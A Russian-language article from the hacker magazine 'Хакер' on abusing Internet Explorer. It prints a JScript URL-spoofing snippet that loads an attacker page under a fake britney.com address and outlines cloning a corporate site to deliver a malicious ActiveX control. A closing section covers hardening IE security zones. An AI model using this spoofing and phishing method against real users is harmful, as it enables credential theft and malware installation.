Чиним зло через Internet Explorer

Петр Каньковски

Спецвыпуск: Хакер, номер #048, стр. 048-014-3

<script language="JScript">

location.href=unescape('http://www.britney.com%01@xakepsite.ru/hack.htm')

</script>

В результате браузер переходит на xakepsite.ru/hack.htm, но в адресной строке отображается http://www.britney.com! (Подробнее о реализации этого бага для воровства почтовых паролей писал NSD в одном их номеров Х.) В нашем же случае злоумышленнику остается только скопировать оформление оригинального сайта и среди парочки Flash-мультиков вставить в него агрессивный Active-X. Такую шутку будет особенно легко сыграть с некоторыми корпоративными сайтами, которые в своем исходном варианте насыщены Active-X-контролами.

Пользователь даже не почувствует разницы. Еще раз посмотри на картинку. Ты на сайте известной корпорации и качаешь ActiveX ее же производства. Какой тут может быть подвох? Если тщательно скопировать оформление и содержание сайта, можно обдурить самого крутого админа, потому что почти никто не читает этих глупых предупреждений. Именно так работает социальная инженерия в сочетании с хорошо подобранными эксплоитами.

Кстати, когда установлен низкий уровень безопасности, предупреждение даже не появляется. Если удастся найти эксплоит для cross-zone scripting, можно запустить Active-X в зоне "Мой компьютер", и тогда пользователю вообще не зададут никаких вопросов о безопасности. Хотя в этом случае логичнее и проще запускать обычный exe’шник через уязвимость MHT Redirection и не возиться с Active-X.

Хочешь мира – готовься к войне

Как защититься от таких атак? Перейти на другие браузеры? Не выход - в Opera тоже частенько находят баги, хотя, надо признать, норвежцы исправляют их быстрее, чем Microsoft. Самый действенный способ - отключить Active-X. В свойствах IE, закладка "Securuty", кнопка "Custom Level", стоит поставить высокий уровень для всех зон (компьютер, интернет, локальная сеть). Зона "Мой компьютер" по умолчанию скрыта. Чтобы показать ее, нужно изменить параметр HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\(номер зоны)\Flags. Сбрось в этом числе "шестнадцатеричный бит" 0x20. Например, у меня стоит 0x21, значит, нужно оставить только единицу.

WWW

http://www.securitylab.ru/?id=40822 - Уязвимость, которая при переполнении памяти теоретически позволяет выполнить Active-X без подписи.

http://continue.to/trie - Список не закрытых патчами уязвимостей в IE со ссылками на эксплоиты. http://www.guninski.com/signedactivex2.html - Эта уязвимость позволяет загружать старые версии системных DLL с багами, к которым применимы давно известные эксплоиты.

Электронная подпись не гарантирует безопасности продукта ;).

Старый не всегда означает неэффективный. Обрати внимание на жалобы пользователей в центрах технической поддержки :).

Использование переведенной в статье информации о подделке электронных подписей совершенно противозаконно. Данная информация публикуется исключительно в ознакомительных целях. Статья была написана с целью показать уязвимые места IE и предупредить пользователей и производителя, а не для поддержки преступников. За использование информации в противозаконных целях автор и редакция ответственности не несут!